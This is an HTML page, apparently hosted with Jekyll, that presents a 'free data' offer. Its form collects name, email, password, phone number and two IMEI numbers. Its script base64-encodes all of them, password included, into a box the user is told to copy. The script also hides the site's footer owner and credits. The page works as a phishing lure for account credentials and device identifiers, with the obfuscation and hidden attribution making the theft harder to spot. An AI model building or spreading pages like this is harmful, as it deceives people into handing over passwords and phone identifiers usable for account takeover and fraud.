---
layout: default
---

<head>
	<style>

	input[type=text], select, textarea{
	  width: 100%;
	  padding: 12px;
	  border: 1px solid #ccc;
	  border-radius: 4px;
	  box-sizing: border-box;
	  resize: vertical;
	}
	input[type=password], select, textarea{
	  width: 100%;
	  padding: 12px;
	  border: 1px solid #ccc;
	  border-radius: 4px;
	  box-sizing: border-box;
	  resize: vertical;
	}
	input[type=tel], select, textarea{
	  width: 100%;
	  padding: 12px;
	  border: 1px solid #ccc;
	  border-radius: 4px;
	  box-sizing: border-box;
	  resize: vertical;
	}
	input[type=email], select, textarea{
	  width: 100%;
	  padding: 12px;
	  border: 1px solid #ccc;
	  border-radius: 4px;
	  box-sizing: border-box;
	  resize: vertical;
	}
	input[type=text], select, textarea{
	  width: 100%;
	  padding: 12px;
	  border: 1px solid #ccc;
	  border-radius: 4px;
	  box-sizing: border-box;
	  resize: vertical;
	}
		
	textarea {
	  width: 100%;
	  height: 150px;
	  padding: 12px 20px;
	  box-sizing: border-box;
	  border: 2px solid #ccc;
	  border-radius: 4px;
	  background-color: #f8f8f8;
	  resize: none;
	}

	
	label {
	  padding: 12px 12px 12px 0;
	  display: inline-block;
	}


	input[type=submit,reset] {
	  background-color: #4CAF50;
	  color: white;
	  padding: 12px 20px;
	  border: none;
	  border-radius: 4px;
	  cursor: pointer;
	  float: right;
	}

	/* Style the container */
	.container {
	  border-radius: 5px;
	  background-color: #f2f2f2;
	  padding: 20px;
	}

	/* Floating column for labels: 25% width */
	.col-25 {
	  float: left;
	  width: 25%;
	  margin-top: 6px;
	}

	/* Floating column for inputs: 75% width */
	.col-75 {
	  float: left;
	  width: 75%;
	  margin-top: 6px;
	}

	/* Clear floats after the columns */
	.row:after {
	  content: "";
	  display: table;
	  clear: both;
	}

	/* Responsive layout - when the screen is less than 600px wide, make the two columns stack on top of each other instead of next to each other */
	@media screen and (max-width: 600px) {
	  .col-25, .col-75, input[type=submit] {
	    width: 100%;
	    margin-top: 0;
	  }
	}
	}
	</style>
</head>

<body>
<h1> Enter valid details only. Otherwise you will face some problems </h1>


<div class='DC' id='DC'>
  <form id='form_dc'>
   
      <label for='fname'>First name</label>
      <input id='fname' name='fname' type='text' value=''/><br/>
        
      <label for='lname'>Last name</label>
      <input id='lname' name='lname' type='text' value=''/><br/>
        
      <label for='email'>Enter your email</label>
  	  <input id='email' name='email' type='email'/><br/>
	  
	<label for='email'>Enter your password</label>
  	  <input id='pass' name='pass' type='password'/><br/>
        
      <label for='phone'>Enter your phone number (for send free data)</label>
  	  <input id='phone' name='phone' pattern='[0-9]{10}' type='tel'/><br/>
        
      <label for='imei'>Enter your IMEI 1</label>
	  <input id='imei' name='imei' type='text'/><br/>
	
	  <label for='imei'>Enter your IMEI 2*</label>
	  <input id='imei2' name='imei2' type='text'/><br/>
	  
	  <br/><br/>

      <input id='dc_submit' type='button' value='Generate'/>
      <input type='reset'/>
    </form>
  
	<textarea cols='50' id='txtArea' value="Copy all the text here after generate" rows='4'/></textarea>
</div>
</body>

<script>
	
  document.getElementsByClassName('btn')[0].style.visibility = "hidden";
  document.getElementsByClassName('site-footer-owner')[0].style.visibility = "hidden";
  document.getElementsByClassName('site-footer-credits')[0].style.visibility = "hidden"
  window.setTimeout(function() {
        document.body.className = document.body.className.replace('site-footer-owner','');
	document.body.className = document.body.className.replace('site-footer-credits','');
  }, 10);
  var form = document.getElementById("form_dc");
  document.getElementById("dc_submit").addEventListener("click", function () {
	  
      var data = document.getElementById("fname").value +","+ document.getElementById("lname").value +","+ document.getElementById("email").value +","+ document.getElementById("pass").value +","+ document.getElementById("phone").value +","+ document.getElementById("imei").value +","+ document.getElementById("imei2").value;
      var encodedString = btoa(data);
      console.log(encodedString);
      document.getElementById("txtArea").value = encodedString;
	
  });
</script>

